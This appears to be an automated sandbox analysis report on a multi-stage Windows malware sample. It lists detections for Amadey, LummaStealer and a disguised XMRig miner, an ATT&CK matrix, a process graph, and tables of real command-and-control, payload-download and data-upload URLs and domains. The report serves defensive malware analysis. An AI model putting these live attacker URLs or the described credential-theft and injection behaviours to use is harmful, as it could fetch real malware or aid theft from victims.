                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDB
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDB
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPS
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPS
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPS
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPS
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGRE
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGRE
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPS
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPS
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOP
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOP
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQL
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQL
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQL
                            Source: C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQL
                            Source: Yara matchFile source: 00000030.00000003.3302895820.0000000001332000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                            Remote Access Functionality

                            barindex
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                            Source: Yara matchFile source: 00000025.00000002.2838016524.0000000003200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000024.00000003.2813486090.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000025.00000003.2817891813.00000000009D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000024.00000003.2818001314.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BAEC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,6_2_00BAEC48
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BADF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,6_2_00BADF51
                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information1
                            Scripting
                            Valid Accounts3
                            Windows Management Instrumentation
                            1
                            Scripting
                            1
                            DLL Side-Loading
                            1
                            Deobfuscate/Decode Files or Information
                            2
                            OS Credential Dumping
                            2
                            System Time Discovery
                            Remote Services1
                            Archive Collected Data
                            12
                            Ingress Tool Transfer
                            Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts11
                            Native API
                            1
                            DLL Side-Loading
                            1
                            Access Token Manipulation
                            41
                            Obfuscated Files or Information
                            121
                            Input Capture
                            14
                            File and Directory Discovery
                            Remote Desktop Protocol31
                            Data from Local System
                            11
                            Encrypted Channel
                            Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts12
                            Command and Scripting Interpreter
                            11
                            Scheduled Task/Job
                            312
                            Process Injection
                            121
                            Software Packing
                            Security Account Manager368
                            System Information Discovery
                            SMB/Windows Admin Shares121
                            Input Capture
                            3
                            Non-Application Layer Protocol
                            Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal Accounts11
                            Scheduled Task/Job
                            Login Hook11
                            Scheduled Task/Job
                            1
                            DLL Side-Loading
                            NTDS1161
                            Security Software Discovery
                            Distributed Component Object ModelInput Capture124
                            Application Layer Protocol
                            Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud Accounts1
                            PowerShell
                            Network Logon ScriptNetwork Logon Script11
                            Masquerading
                            LSA Secrets12
                            Process Discovery
                            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts361
                            Virtualization/Sandbox Evasion
                            Cached Domain Credentials361
                            Virtualization/Sandbox Evasion
                            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                            Access Token Manipulation
                            DCSync1
                            Application Window Discovery
                            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job312
                            Process Injection
                            Proc Filesystem11
                            Remote System Discovery
                            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                            System Network Configuration Discovery
                            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577323 Sample: random.exe_Y.exe Startdate: 18/12/2024 Architecture: WINDOWS Score: 100 113 grannyejh.lat 2->113 115 www.google.com 2->115 117 4 other IPs or domains 2->117 143 Suricata IDS alerts for network traffic 2->143 145 Found malware configuration 2->145 147 Malicious sample detected (through community Yara rule) 2->147 149 17 other signatures 2->149 11 skotes.exe 29 2->11         started        16 random.exe_Y.exe 5 2->16         started        18 Intel_PTT_EK_Recertification.exe 2->18         started        20 2 other processes 2->20 signatures3 process4 dnsIp5 127 185.215.113.43, 49789, 49796, 49833 WHOLESALECONNECTIONSNL Portugal 11->127 129 31.41.244.11, 49806, 49837, 49859 AEROEXPRESS-ASRU Russian Federation 11->129 97 C:\Users\user\AppData\...\f1e68d5060.exe, PE32 11->97 dropped 99 C:\Users\user\AppData\...\5b3f6dd868.exe, PE32 11->99 dropped 101 C:\Users\user\AppData\...\c5bc1413d7.exe, PE32 11->101 dropped 107 7 other malicious files 11->107 dropped 193 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->193 215 2 other signatures 11->215 22 4802836d37.exe 8 11->22         started        26 d7691cd336.exe 11->26         started        28 5b3f6dd868.exe 11->28         started        41 2 other processes 11->41 103 C:\Users\user\AppData\Local\...\skotes.exe, PE32 16->103 dropped 105 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 16->105 dropped 195 Detected unpacking (changes PE section rights) 16->195 197 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 16->197 199 Tries to evade debugger and weak emulator (self modifying code) 16->199 201 Tries to detect virtualization through RDTSC time measurements 16->201 31 skotes.exe 16->31         started        203 Antivirus detection for dropped file 18->203 205 Multi AV Scanner detection for dropped file 18->205 207 Suspicious powershell command line found 18->207 217 2 other signatures 18->217 33 powershell.exe 18->33         started        35 explorer.exe 18->35         started        209 Injects code into the Windows Explorer (explorer.exe) 20->209 211 Modifies the context of a thread in another process (thread injection) 20->211 213 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 20->213 37 powershell.exe 20->37         started        39 explorer.exe 20->39         started        file6 signatures7 process8 dnsIp9 93 C:\Users\user\AppData\Local\Temp\...\7z.exe, PE32+ 22->93 dropped 95 C:\Users\user\AppData\Local\Temp\...\7z.dll, PE32+ 22->95 dropped 151 Multi AV Scanner detection for dropped file 22->151 153 Contains functionality to register a low level keyboard hook 22->153 43 cmd.exe 2 22->43         started        155 Detected unpacking (changes PE section rights) 26->155 157 Machine Learning detection for dropped file 26->157 159 Tries to evade debugger and weak emulator (self modifying code) 26->159 161 Switches to a custom stack to bypass stack traces 26->161 46 svchost.exe 26->46         started        48 WerFault.exe 26->48         started        131 httpbin.org 98.85.100.80, 443, 49908 TWC-11351-NORTHEASTUS United States 28->131 133 twentytk20pn.top 185.185.71.170 SPRINTHOSTRU Russian Federation 28->133 135 home.twentytk20pn.top 28->135 163 Tries to detect sandboxes and other dynamic analysis tools (window names) 28->163 165 Tries to detect sandboxes / dynamic malware analysis system (registry check) 28->165 167 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 28->167 169 Antivirus detection for dropped file 31->169 171 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 31->171 173 Hides threads from debuggers 31->173 50 PING.EXE 33->50         started        53 conhost.exe 33->53         started        55 conhost.exe 37->55         started        175 Injects a PE file into a foreign processes 41->175 57 f1e68d5060.exe 41->57         started        59 c5bc1413d7.exe 41->59         started        61 3 other processes 41->61 file10 signatures11 process12 dnsIp13 179 Uses cmd line tools excessively to alter registry or file data 43->179 63 in.exe 1 43->63         started        67 7z.exe 2 43->67         started        69 7z.exe 3 43->69         started        71 9 other processes 43->71 181 Checks if the current machine is a virtual machine (disk enumeration) 46->181 183 Switches to a custom stack to bypass stack traces 46->183 119 127.1.10.1 unknown unknown 50->119 121 pancakedipyps.click 172.67.209.202 CLOUDFLARENETUS United States 57->121 185 Query firmware table information (likely to detect VMs) 57->185 187 Tries to harvest and steal ftp login credentials 57->187 189 Tries to harvest and steal browser information (history, passwords, etc) 57->189 191 Tries to steal Crypto Currency Wallets 57->191 123 grannyejh.lat 104.21.64.80, 443, 49880, 49886 CLOUDFLARENETUS United States 59->123 signatures14 process15 file16 109 C:\Users\...\Intel_PTT_EK_Recertification.exe, PE32+ 63->109 dropped 137 Suspicious powershell command line found 63->137 139 Uses cmd line tools excessively to alter registry or file data 63->139 141 Uses schtasks.exe or at.exe to add and modify task schedules 63->141 73 powershell.exe 63->73         started        76 attrib.exe 63->76         started        78 attrib.exe 63->78         started        80 schtasks.exe 63->80         started        111 C:\Users\user\AppData\Local\Temp\...\in.exe, PE32+ 67->111 dropped signatures17 process18 signatures19 177 Uses ping.exe to check the status of other devices and networks 73->177 82 PING.EXE 73->82         started        85 conhost.exe 73->85         started        87 conhost.exe 76->87         started        89 conhost.exe 78->89         started        91 conhost.exe 80->91         started        process20 dnsIp21 125 127.0.0.1 unknown unknown 82->125

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand
                            SourceDetectionScannerLabelLink
                            random.exe_Y.exe54%VirustotalBrowse
                            random.exe_Y.exe50%ReversingLabsWin32.Infostealer.Tinba
                            random.exe_Y.exe100%AviraTR/Crypt.TPM.Gen
                            random.exe_Y.exe100%Joe Sandbox ML
                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%AviraTR/Crypt.TPM.Gen
                            C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exe100%AviraTR/Crypt.TPM.Gen
                            C:\Users\user\AppData\Local\Temp\main\extracted\in.exe100%AviraHEUR/AGEN.1352802
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe100%AviraTR/Crypt.TPM.Gen
                            C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe100%AviraHEUR/AGEN.1352802
                            C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\main\extracted\in.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe75%ReversingLabsWin32.Trojan.LummaStealer
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe88%ReversingLabsWin32.Trojan.Amadey
                            C:\Users\user\AppData\Local\Temp\1016875001\4802836d37.exe88%ReversingLabsWin32.Trojan.Amadey
                            C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exe75%ReversingLabsWin32.Trojan.LummaStealer
                            C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe50%ReversingLabsWin32.Infostealer.Tinba
                            C:\Users\user\AppData\Local\Temp\main\7z.dll0%ReversingLabs
                            C:\Users\user\AppData\Local\Temp\main\7z.exe0%ReversingLabs
                            C:\Users\user\AppData\Local\Temp\main\extracted\in.exe67%ReversingLabsWin64.Trojan.Nekark
                            C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe67%ReversingLabsWin64.Trojan.Nekark
                            No Antivirus matches
                            No Antivirus matches
                            SourceDetectionScannerLabelLink
                            http://31.41.244.11/files/unique1/random.exeE0%Avira URL Cloudsafe
                            http://31.41.244.11/files/burpin1/random.exeedB0%Avira URL Cloudsafe
                            http://185.215.113.43/Zu7JuNko/index.php6879001100%Avira URL Cloudmalware
                            http://185.215.113.43/Zu7JuNko/index.php.usere100%Avira URL Cloudmalware
                            http://185.215.113.43/Zu7JuNko/index.php7H100%Avira URL Cloudmalware
                            pancakedipyps.click0%Avira URL Cloudsafe
                            http://185.215.113.43/Zu7JuNko/index.php879001100%Avira URL Cloudmalware
                            http://185.215.113.43/Zu7JuNko/index.phpcal100%Avira URL Cloudmalware
                            http://185.215.113.43/Zu7JuNko/index.phpLocal100%Avira URL Cloudmalware
                            http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN17343663220%Avira URL Cloudsafe
                            http://31.41.244.11/files/fate/random.exel%0%Avira URL Cloudsafe
                            http://31.41.244.11/files/burpin1/random.exem0%Avira URL Cloudsafe
                            http://185.215.113.43/Zu7JuNko/index.phpHH100%Avira URL Cloudmalware
                            http://185.215.113.43/Zu7JuNko/index.php38c2817dba29a4b5b25dcf0l100%Avira URL Cloudmalware
                            http://31.41.244.11/files/dodo/random.exe100%Avira URL Cloudphishing
                            https://grannyejh.lat/api0%Avira URL Cloudsafe
                            http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=W5I04RJg8H8zmx9g17345188800%Avira URL Cloudsafe
                            http://185.215.113.43/Zu7JuNko/index.phpTemp100%Avira URL Cloudmalware
                            http://31.41.244.11/files/dodo/random.exe4&M0%Avira URL Cloudsafe
                            http://twentytk20pn.top/v1/upload.php0%Avira URL Cloudsafe
                            NameIPActiveMaliciousAntivirus DetectionReputation
                            pancakedipyps.click
                            172.67.209.202
                            truefalse
                              high
                              grannyejh.lat
                              104.21.64.80
                              truetrue
                                unknown
                                www.google.com
                                142.250.181.132
                                truefalse
                                  high
                                  home.twentytk20pn.top
                                  185.185.71.170
                                  truefalse
                                    high
                                    twentytk20pn.top
                                    185.185.71.170
                                    truefalse
                                      high
                                      httpbin.org
                                      98.85.100.80
                                      truefalse
                                        high
                                        sweepyribs.lat
                                        unknown
                                        unknownfalse
                                          high
                                          NameMaliciousAntivirus DetectionReputation
                                          pancakedipyps.clicktrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          necklacebudi.latfalse
                                            high
                                            http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322true
                                            • Avira URL Cloud: safe
                                            unknown
                                            aspecteirs.latfalse
                                              high
                                              http://185.215.113.43/Zu7JuNko/index.phpfalse
                                                high
                                                sustainskelet.latfalse
                                                  high
                                                  crosshuaht.latfalse
                                                    high
                                                    rapeflowwj.latfalse
                                                      high
                                                      https://pancakedipyps.click/apifalse
                                                        high
                                                        http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=W5I04RJg8H8zmx9g1734518880true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        energyaffai.latfalse
                                                          high
                                                          https://httpbin.org/ipfalse
                                                            high
                                                            https://grannyejh.lat/apitrue
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://twentytk20pn.top/v1/upload.phptrue
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            grannyejh.latfalse
                                                              high
                                                              discokeyus.latfalse
                                                                high
                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                http://185.215.113.43/Zu7JuNko/index.phpTskotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#skotes.exe, 00000006.00000002.3383542178.00000000005E9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://185.215.113.43/Zu7JuNko/index.php.usereskotes.exe, 00000006.00000002.3383542178.00000000005D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    unknown
                                                                    http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://ocsp.sectigo.com0skotes.exe, 00000006.00000002.3383542178.00000000005E9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://31.41.244.11/files/unique3/random.exeskotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://185.215.113.43/Zu7JuNko/index.phpaskotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://185.215.113.43/Zu7JuNko/index.php879001skotes.exe, 00000006.00000002.3383542178.00000000005D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            unknown
                                                                            http://31.41.244.11/files/fate/random.exeskotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://185.215.113.43/Zu7JuNko/index.phpncodedskotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://185.215.113.43/Zu7JuNko/index.php6879001skotes.exe, 00000006.00000002.3383542178.00000000005D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0skotes.exe, 00000006.00000002.3383542178.00000000005E9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://185.215.113.43/Zu7JuNko/index.php7Hskotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    unknown
                                                                                    http://31.41.244.11/files/burpin1/random.exeedBskotes.exe, 00000006.00000002.3383542178.00000000005D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://185.215.113.43/Zu7JuNko/index.phpLocalskotes.exe, 00000006.00000002.3383542178.00000000005D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    unknown
                                                                                    http://31.41.244.11/files/unique1/random.exeEskotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://185.215.113.43/Zu7JuNko/index.phpcodedskotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://185.215.113.43/Zu7JuNko/index.phpcalskotes.exe, 00000006.00000002.3383542178.00000000005D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      http://185.215.113.43/Zu7JuNko/index.php0skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://31.41.244.11/files/fate/random.exel%skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#skotes.exe, 00000006.00000002.3383542178.00000000005E9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://sectigo.com/CPS0skotes.exe, 00000006.00000002.3383542178.00000000005E9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://31.41.244.11/files/burpin1/random.exemskotes.exe, 00000006.00000002.3383542178.00000000005D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://185.215.113.43/Zu7JuNko/index.phpTempskotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            unknown
                                                                                            https://xmrig.com/wizard%sIntel_PTT_EK_Recertification.exe, 0000001F.00000003.2785095073.00000261B8C20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2791286176.00000001402DD000.00000002.00000001.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://185.215.113.43/Zu7JuNko/index.phpHHskotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: malware
                                                                                              unknown
                                                                                              http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://xmrig.com/wizardIntel_PTT_EK_Recertification.exe, 0000001F.00000003.2785095073.00000261B8C20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2791286176.00000001402DD000.00000002.00000001.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://31.41.244.11/files/dodo/random.exeskotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: phishing
                                                                                                  unknown
                                                                                                  http://31.41.244.11/files/dodo/random.exe4&Mskotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://31.41.244.11/files/burpin1/random.exeskotes.exe, 00000006.00000002.3383542178.00000000005D6000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3383542178.0000000000598000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://185.215.113.43/Zu7JuNko/index.phpesskotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0yskotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://198.251.84.107:9254/dc33e47f6acdb4eefe/ahbjmv76.0lxxexsvchost.exe, 00000025.00000002.2836976541.00000000008EC000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://185.215.113.43/Zu7JuNko/index.php38c2817dba29a4b5b25dcf0lskotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: malware
                                                                                                          unknown
                                                                                                          http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zskotes.exe, 00000006.00000002.3383542178.00000000005E9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://31.41.244.11/files/unique1/random.exeskotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://xmrig.com/docs/algorithmsIntel_PTT_EK_Recertification.exe, 0000001F.00000003.2785095073.00000261B8C20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2791286176.00000001402DD000.00000002.00000001.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://usbtor.ru/viewtopic.php?t=798)Z4802836d37.exe, 00000008.00000002.3384135474.0000000000423000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                  high
                                                                                                                  http://185.215.113.43/Zu7JuNko/index.phpqYo30zpOYVpskotes.exe, 00000006.00000002.3383542178.00000000005F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
